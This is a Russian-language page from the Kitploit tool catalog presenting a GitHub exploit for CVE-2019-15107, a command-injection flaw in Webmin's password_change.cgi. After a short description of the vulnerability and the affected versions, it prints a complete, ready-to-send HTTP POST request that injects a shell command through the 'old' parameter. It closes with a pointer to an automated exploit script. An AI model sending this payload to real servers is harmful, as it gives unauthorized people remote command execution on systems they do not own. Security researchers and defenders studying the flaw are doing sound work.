Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/alewong/webminrce-exp-cve-2019-15107-
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubalewong/webminrce-exp-cve-2019-15107-

WebminRCE-EXP-CVE-2019-15107-

Уязвимость удаленного выполнения кода в Webmin

Репозиторий
3526 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-15107: Эксплойт-модули для уязвимости удаленного выполнения кода в Webmin

  1. Описание уязвимости Webmin — это мощный инструмент управления системой на основе Web, широко используемый в системах Unix. В процессе обработки запроса Password_Change.cgi в Webmin параметр old содержит уязвимость внедрения команд (command injection), которая может быть злонамеренно использована атакующим. Если пользователь включил функцию сброса пароля в Webmin, атакующий может воспользоваться этой уязвимостью для выполнения произвольных команд в уязвимой системе и получения доступа к оболочке системы (Shell).

Затронутые версии: Webmin 1.920 и ниже

  1. Эксплуатация уязвимости Способ 1: Ручная проверка Перейдите на страницу, проигнорировав сертификат, и вы увидите страницу входа в Webmin шаг 1

Отправьте следующий пакет данных, чтобы выполнить команду id:

root@kitploit:~
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

шаг 2

Способ 2: Использование скрипта шаг 3

Скачать инструмент